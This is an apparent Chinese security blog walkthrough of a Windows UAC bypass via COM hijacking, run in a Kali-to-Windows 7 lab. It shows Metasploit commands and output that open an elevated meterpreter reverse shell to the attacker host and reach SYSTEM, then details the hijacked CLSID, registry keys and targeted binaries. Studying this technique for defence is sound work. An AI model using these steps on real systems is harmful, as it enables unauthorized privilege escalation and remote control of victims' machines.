

Hu3sky's blog

bypassUAC_via_comhijacking

Hu3sky's blog

bypassUAC_via_comhijacking

Word count: 804 / Reading time: 4 min

 2019/05/13   Share

• 
• 
• 
• 
• 

bypassUAC_via_comhijacking

What is UAC

用户帐户控制（User Account Control，简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权，以达到帮助阻止恶意程序（有时也称为“恶意软件”）损坏系统的效果

bypassUAC_via_comhijacking

靶机：WIN7
攻击机：KALI

先回弹一个msf会话，发现不能getsystem

使用bypass_uac模块

msf exploit(handler) > use exploit/windows/local/bypassuac_comhijack
msf exploit(bypassuac_comhijack) > set session 1
session => 1
msf exploit(bypassuac_comhijack) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf exploit(bypassuac_comhijack) > run

[*] Started HTTPS reverse handler on https://192.168.107.145:6666
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Computer Managment via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\Hu3sky\AppData\Local\Temp\BgTSfENK.dll ...
[*] Executing high integrity process ...
[*] https://192.168.107.145:6666 handling request from 192.168.107.144; (UUID: tpdt4wve) Staging x64 payload (206423 bytes) ...
[*] Meterpreter session 5 opened (192.168.107.145:6666 -> 192.168.107.144:51040) at 2019-05-13 22:12:58 +0800
[+] Deleted C:\Users\Hu3sky\AppData\Local\Temp\BgTSfENK.dll
[*] Cleaining up registry ...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin))

成功,可以明显看到劫持的ID{0A29FF9E-7F9C-4437-8B11-F424491E3931}
不过过不了360

原理

COM

COM是Component Object Model （组件对象模型）的缩写。

CLSID

即全局唯一标识符，CLSID是指windows系统对于不同的应用程序，文件类型，OLE对象，特殊文件夹以及各种系统组件分配一个唯一表示它的ID代码，用于对其身份的标示和与其他对象进行区分

当某程序调用对象时，是通过CLSID寻找的

Win + R + ::{20D04FE0-3AEA-1069-A2D8-08002B30309D}

即可打开我的电脑

CLSID 在注册表中的表现形式

InprocHandler32 指定应用程序使用的自定义处理程序
InprocServer32  注册32位进程所需要的模块、线程属性配置

InprocServer32

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
   {CLSID}
      InprocServer32
         (Default) = path
         ThreadingModel = value #ThreadingModel是一个REG_SZ值，用于指定线程模型

COM组件加载过程

1. HKCU\Software\Classes\CLSID
2. HKCR\CLSID
3. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\

COM组件劫持原理

当进程寻找COM组件时，第一步

HKCU\Software\Classes\CLSID

所以，在CLSID下新建一个对象ID就能够劫持某个进程或多个进程

分析源码

在

/usr/share/metasploit-framework/modules/exploits/windows/local/bypassuac_comhijack.rb

先是系统版本检测


劫持点

%WINDIR%\System32\eventvwr.exe
%WINDIR%\System32\mmc.exe

劫持的ID 都为0A29FF9E-7F9C-4437-8B11-F424491E3931

注册表项为

HKCU\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\InProcServer32
HKCU\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\ShellFolder

InProcServer32’s Key:

Default -> %TEMP%\\#{rand_text_alpha(8)}.dll
ThreadingModel -> Apartment

ShellFolder’s Key:

LoadWithoutCOM -> NULL
HideOnDesktop -> NULL
Attributes -> 0xf090013d

过程
eventvwr.exe寻找{0A29FF9E-7F9C-4437-8B11-F424491E3931}组件，该组件需要加载InProcServer32指定的DLL，而该DLL就是msf生成的dll，即#{rand_text_alpha(8)}.dll,当DLL加载至eventvwr.exe的过程中，Windows会复制一个管理员的Access Token给这个DLL创建的进程

Referers

• https://docs.microsoft.com/zh-cn/windows/desktop/com/inprocserver32
• https://docs.microsoft.com/zh-cn/windows/desktop/com/clsid-key-hklm
• http://payloads.online/archivers/2018-10-14/1

原文作者: Hu3sky

原文链接: http://yoursite.com/2019/05/13/bypass_uac/

发表日期: May 13th 2019, 10:01:00 am

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  深入理解浏览器编码
• Previous Post
  JavaScript Prototype 污染攻击之 Code-Breaking-TheJS篇

Powered by Hexotheme Archer

本站总访问量次

本站总访问量: :)

CATALOG

1. 1. bypassUAC_via_comhijacking
   1. 1.1. What is UAC
   2. 1.2. bypassUAC_via_comhijacking
   3. 1.3. 原理
      1. 1.3.1. COM
      2. 1.3.2. CLSID
         1. 1.3.2.1. CLSID 在注册表中的表现形式
      3. 1.3.3. COM组件加载过程
      4. 1.3.4. COM组件劫持原理
      5. 1.3.5. 分析源码
2. 2. Referers



• Archive
• Tag
• Cate

Total : 101

2021

• 01/22Oracle补丁日 ：CVE-2020-14756 漏洞利用及补丁分析
• 01/18CVE-2020-17518/17519：Apache Flink 目录遍历漏洞&路由分析
• 01/042020 总结 & 2021 计划

2020

• 12/11浅析 S2-061
• 10/19Websphere 最新版9.0.5.5 反序列化入口挖掘以及XXE构造
• 04/19Orcale 4月补丁日的几个漏洞以及CVE-2020-2801的简单分析
• 04/08CVE-2020-10204/CVE-2020-10199 Nexus Repository Manager3 分析&以及三个类的回显构造
• 03/20weblogic t3 协议利用与防御
• 03/08CVE-2020-2555 漏洞分析
• 03/06JMX-RMI
• 01/06shiro-1.2.4-rememberMe反序列化分析与基于Commons-Collections3.2.1下的payload构造

2019

• 12/20CVE-2018-1270 Remote Code Execution with spring-messaging 分析
• 10/20Joomla 3.4.6 远程代码执行
• 10/16WebLogic-XMLDecoder反序列化分析
• 10/05Fastjson反序列化漏洞以及多版本补丁分析
• 10/02JAVA XXE
• 09/24Thinkphp多个版本注入分析
• 09/20Thinkphp3个版本数据库操作以及底层代码分析
• 09/13java反序列化由浅入深及JNDI注入理解(二)-JAVA Apache-Commons-Collections
• 09/10Ciscn华北赛区Dropbox题解
• 09/08java反序列化由浅入深及JNDI注入理解(一)-Spring反序列化
• 09/062019护网杯esaypy
• 09/04php-fpm&fast-cgi学习
• 08/24java安全漏洞入门之 s2-001
• 08/24java安全漏洞入门之 s2-003&s2-005
• 08/21.user.ini后门
• 08/15laravel5.7-unserialize-RCE
• 08/08De1CTF Ssrfme 详解
• 08/06深入理解浏览器编码
• 05/13bypassUAC_via_comhijacking
• 05/07JavaScript Prototype 污染攻击之 Code-Breaking-TheJS篇
• 05/06JavaScript Prototype 污染攻击之 基础篇
• 04/24内网中的PowerSploit
• 04/23第12届全国大学生信息安全竞赛Web题解
• 04/22DDCTF部分 Write up
• 04/21How To Use Cobalt Strike(备忘录)
• 04/02Content Security Policy&Bypass
• 04/01跨域相关问题
• 03/27Windows安全下的一些网络认证
• 03/21三层内网搭建&MSF正反向代理穿透
• 02/28WordPress5.0 RCE 分析
• 02/22About OAuth2.0
• 02/20Metinfo 6.1.2 SqlInjection
• 02/16初识Redis未授权访问
• 02/15nullcon ctf 部分web
• 02/1435c3-POST 学习
• 02/11Pwnhub Pink friend 学习
• 02/09LCTF-babyphp's revenge
• 02/07HCTF2018 部分Web
• 01/31从两道CTF实例看python格式化字符串漏洞
• 01/29DiscuzX 3.4 前台SSRF
• 01/28齐博CMSv7审计
• 01/28从SCTF看nginx配置问题
• 01/23Code-Breaking Puzzles
• 01/210ctf-ezdoor
• 01/18Tp5.0.0-5.0.23 RCE学习
• 01/11Thinkphp5.* getshell 分析
• 01/11PHPCMS2008_getshell
• 01/0735C3 CTF 部分解题记录（junior）

2018

• 12/25SWPUCTF_WP
• 12/23寒假学习计划
• 10/06destoon前台getshell复现
• 09/12YXCMS 1.4.7
• 09/12YXCMS 1.4.7 - Arbitrary file deletion
• 09/07反序列化之phar://学习
• 09/06ssh后门
• 09/03Git
• 09/01python装饰器
• 08/30hackme CTF 记录
• 08/25php-security-calendar-2017
• 08/25eyoucms前台getshell复现
• 08/23Hooskcms 几个小洞
• 08/18Hack the ch4inrulz of Vulnhub
• 08/18Bugku sql注入2
• 08/07Vulnhub\|Cyberry靶机
• 07/17java学习笔记
• 07/05暑假学习计划
• 07/03Bob 1.0.1
• 06/29浅谈XML实体注入漏洞
• 06/22Vulnhub Bsides靶机
• 06/11Linux
• 06/06超级玛丽靶机渗透测试笔记
• 06/04jarvisoj WP
• 05/25域渗透练习
• 05/23Empire使用总结
• 05/09ctf一道题目。php反序列化学习
• 05/03记一次kali渗透测试靶机
• 04/25[Untitled Post]
• 04/24i春秋WP
• 04/24实验吧WP
• 04/20scrapy爬虫实例
• 04/17webug wp
• 04/15线下赛总结
• 04/101个月学习计划
• 04/10Scrapy笔记
• 04/01rnpnet tiki-calendar.php页面存在代码执行漏洞
• 03/28cookie与session的笔记
• 03/23VehicleWorkshop上传漏洞本地复现
• 03/16Redtiger题目
• 03/15会员日Pwnhub题目的复现
• 01/13Flask_SSTI



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

CTF writeup 规划 学习计划 渗透测试 浏览器安全 java安全 漏洞分析 备忘录 代码审计 write-up 学习笔记 Linux Arbitrary-File-Upload CVE-Request sql注入 http协议 内网渗透 Empire git php反序列化 JavaScript python scrapy php魔法 xxe 代码执行 内网 后门 线下赛 前端 域渗透

